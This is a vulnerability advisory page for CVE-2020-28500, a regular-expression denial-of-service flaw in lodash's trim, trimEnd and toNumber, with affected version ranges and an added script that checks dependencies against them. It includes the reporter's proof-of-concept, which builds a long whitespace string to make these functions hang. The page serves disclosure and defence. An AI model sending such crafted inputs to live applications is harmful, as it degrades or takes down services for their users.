GHSA-29mw-wpgm-hmr9

Source
https://github.com/advisories/GHSA-29mw-wpgm-hmr9
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-29mw-wpgm-hmr9/GHSA-29mw-wpgm-hmr9.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-29mw-wpgm-hmr9
Aliases
  • CVE-2020-28500
  • SNYK-JAVA-ORGFUJIONWEBJARS-1074896
  • SNYK-JAVA-ORGWEBJARS-1074894
  • SNYK-JAVA-ORGWEBJARSBOWER-1074892
  • SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074895
  • SNYK-JAVA-ORGWEBJARSNPM-1074893
  • SNYK-JS-LODASH-1018905
Published
2022-01-06T20:30:46Z
Modified
2024-08-01T09:11:58.512292Z
Severity
  • 5.3 (Medium) CVSS v3.1 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
Summary
Regular Expression Denial of Service (ReDoS) in lodash
Details

All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.

Steps to reproduce (provided by reporter Liyuan Chen):

var lo = require('lodash');

// Build a string of the form "1" + n spaces + "1", the input the reporter
// used to trigger the slow path in trim, toNumber and trimEnd.
function build_blank(n) {
    var ret = "1";
    for (var i = 0; i < n; i++) {
        ret += " ";
    }
    return ret + "1";
}

var s = build_blank(50000);

// Time each affected function on the crafted input.
var time0 = Date.now();
lo.trim(s);
var time_cost0 = Date.now() - time0;
console.log("time_cost0: " + time_cost0);

var time1 = Date.now();
lo.toNumber(s);
var time_cost1 = Date.now() - time1;
console.log("time_cost1: " + time_cost1);

var time2 = Date.now();
lo.trimEnd(s);
var time_cost2 = Date.now() - time2;
console.log("time_cost2: " + time_cost2);
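The practical question for a defender is whether a given dependency tree falls inside the affected ranges listed further down this page. The following is an added example, not code from the advisory or from the lodash project: it transcribes the four affected ranges as stated here (lodash and lodash-es fixed in 4.17.21; lodash.trim and lodash.trimend last affected at 4.5.1, with no fixed version listed), compares installed versions against them with a minimal semver comparison, and reports findings. The inventory object is constructed sample input; the version-parsing helper ignores pre-release tags, which is a simplification.

```javascript
// Added example (not from the advisory or the lodash project): check a
// dependency inventory against the affected ranges this advisory lists.

// Affected ranges as stated in GHSA-29mw-wpgm-hmr9.
// "fixed": first safe version; "lastAffected": highest vulnerable version.
const ADVISORY_RANGES = {
  "lodash":         { introduced: "0", fixed: "4.17.21" },
  "lodash-es":      { introduced: "0", fixed: "4.17.21" },
  "lodash.trim":    { introduced: "0", lastAffected: "4.5.1" },
  "lodash.trimend": { introduced: "0", lastAffected: "4.5.1" },
};

// Parse "MAJOR[.MINOR[.PATCH]]" into three integers; missing parts are 0,
// a leading "v" is tolerated, and a pre-release suffix is ignored
// (simplification: "4.17.21-beta" is treated as 4.17.21). Returns null
// when the string does not start with a number.
function parseSemver(v) {
  const m = /^v?(\d+)(?:\.(\d+))?(?:\.(\d+))?/.exec(String(v).trim());
  if (!m) return null;
  return [Number(m[1]), Number(m[2] || 0), Number(m[3] || 0)];
}

// Lexicographic compare of two parsed versions: -1, 0 or 1.
function compareSemver(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// Is `version` of package `name` inside an affected range? Returns true or
// false, or null when the advisory does not cover the package or the
// version string cannot be parsed (callers should treat null as "unknown").
function isAffected(name, version) {
  const range = ADVISORY_RANGES[name];
  if (!range) return null;
  const v = parseSemver(version);
  if (!v) return null;
  if (compareSemver(v, parseSemver(range.introduced)) < 0) return false;
  if (range.fixed) return compareSemver(v, parseSemver(range.fixed)) < 0;
  return compareSemver(v, parseSemver(range.lastAffected)) <= 0;
}

// Walk a flat {name: version} inventory (the shape you get from the
// "packages" map of a package-lock.json after stripping the "node_modules/"
// prefix) and list every vulnerable entry together with the fix the
// advisory names, if any.
function scanInventory(inventory) {
  const findings = [];
  for (const [name, version] of Object.entries(inventory)) {
    if (isAffected(name, version) !== true) continue;
    const range = ADVISORY_RANGES[name];
    findings.push({
      name,
      version,
      advice: range.fixed
        ? "upgrade to >= " + range.fixed
        : "no fixed version listed in the advisory",
    });
  }
  return findings;
}

// Constructed sample inventory: three vulnerable entries, one already
// fixed, one package the advisory does not cover.
const SAMPLE_INVENTORY = {
  "lodash": "4.17.20",
  "lodash-es": "4.17.21",
  "lodash.trim": "4.5.1",
  "lodash.trimend": "4.5.1",
  "other-package": "1.0.0",
};

console.log(JSON.stringify(scanInventory(SAMPLE_INVENTORY), null, 2));
```

The `null` result from `isAffected` is deliberate: an unparseable version (a git URL or a file path in a lockfile, say) should surface as "could not evaluate" rather than silently passing as safe.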
Database specific
{
    "nvd_published_at": "2021-02-15T11:15:00Z",
    "cwe_ids": [
        "CWE-1333",
        "CWE-400"
    ],
    "severity": "MODERATE",
    "github_reviewed": true,
    "github_reviewed_at": "2021-03-19T22:45:28Z"
}
References

Affected packages

npm / lodash

Affected ranges (type SEMVER):
  • Introduced: 0 (unknown introduced version; all previous versions are affected)
  • Fixed: 4.17.21

Ecosystem specific

{
    "affected_functions": [
        "(lodash).toNumber",
        "(lodash).trim",
        "(lodash).trimEnd"
    ]
}

npm / lodash-es

Affected ranges (type SEMVER):
  • Introduced: 0 (unknown introduced version; all previous versions are affected)
  • Fixed: 4.17.21

Ecosystem specific

{
    "affected_functions": [
        "(lodash-es).toNumber",
        "(lodash-es).trim",
        "(lodash-es).trimEnd"
    ]
}

npm / lodash.trimend

Affected ranges (type SEMVER):
  • Introduced: 0 (unknown introduced version; all previous versions are affected)
  • Last affected: 4.5.1

Ecosystem specific

{
    "affected_functions": [
        "(lodash.trimend)"
    ]
}

npm / lodash.trim

Affected ranges (type SEMVER):
  • Introduced: 0 (unknown introduced version; all previous versions are affected)
  • Last affected: 4.5.1

Ecosystem specific

{
    "affected_functions": [
        "(lodash.trim)"
    ]
}